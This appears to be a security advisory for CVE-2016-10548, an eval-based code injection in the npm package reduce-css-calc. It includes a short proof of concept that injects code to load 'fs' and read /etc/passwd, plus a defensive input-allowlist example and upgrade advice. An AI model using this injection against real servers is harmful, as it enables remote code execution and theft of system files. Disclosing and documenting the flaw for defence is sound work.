CVE-2016-10548
Arbitrary Code Injection in reduce-css-calc
Description
Affected versions of `reduce-css-calc` pass input directly to `eval`. If user input is passed into the calc function, this may result in cross-site scripting on the browser, or remote code execution on the server.

## Proof of Concept

```
const reduceCSSCalc = require('reduce-css-calc');
console.log(reduceCSSCalc(`calc( (Buffer(10000)))`));
console.log(reduceCSSCalc(`calc( (global['fs'] = require('fs')))`));
console.log(reduceCSSCalc(`calc( (fs['readFileSync']("/etc/passwd", "utf-8")))`));
```

## Recommendation

Update to version 1.2.5 or later.
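The root cause above is that arbitrary text reaches `eval`. As an added example (not code from the advisory or from the reduce-css-calc project), the following allowlist gate shows what a caller can place in front of any calc() reducer that evaluates its input: only numbers with CSS units, percentages, arithmetic operators, parentheses and the `calc(` keyword pass, so identifiers such as `Buffer`, `global` or `require` are rejected before the reducer ever sees them. The `guardedReduce` wrapper and the accepted unit list are assumptions of this example.

```javascript
// Added example, not part of the advisory or of reduce-css-calc.
// One token of a calc() expression: the calc( keyword, a signed number with an
// optional unit or %, a single arithmetic operator or parenthesis, or whitespace.
const TOKEN = /^(?:calc\(|-?(?:\d+\.?\d*|\.\d+)(?:px|em|rem|%|vh|vw|pt|cm|mm|in)?|[+\-*\/()]|\s+)/;

// Returns true only if the whole string is made of allowlisted tokens and its
// parentheses balance. Anything else (letters, quotes, brackets, dots used as
// property access) fails the match and is rejected.
function isSafeCalcExpression(expr) {
  if (typeof expr !== 'string' || expr.length > 200) return false;
  let rest = expr;
  let depth = 0;
  while (rest.length > 0) {
    const m = TOKEN.exec(rest);
    if (!m) return false;                 // token outside the allowlist
    const tok = m[0];
    if (tok === 'calc(' || tok === '(') {
      depth += 1;
    } else if (tok === ')') {
      depth -= 1;
      if (depth < 0) return false;        // stray closing parenthesis
    }
    rest = rest.slice(tok.length);
  }
  return depth === 0;
}

// Hypothetical wrapper: refuse to hand rejected input to the reducer at all.
// `reduce` is whatever calc() reducer the application uses.
function guardedReduce(reduce, expr) {
  if (!isSafeCalcExpression(expr)) {
    throw new Error('rejected calc() input: ' + JSON.stringify(expr));
  }
  return reduce(expr);
}
```

The gate is a containment measure for callers that cannot upgrade immediately; the fix remains updating to 1.2.5 or later, where the input is no longer passed to `eval`.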
How to fix CVE-2016-10548
To remediate CVE-2016-10548, upgrade the affected package to a fixed version below.
- `reduce-css-calc`: upgrade to 1.2.5 or later
Is CVE-2016-10548 being exploited?
Low — EPSS is 0.4%, meaning exploitation activity has not been observed at scale.
Affected packages (1)
- `reduce-css-calc`: all versions before 1.2.5 (>= 0, < 1.2.5)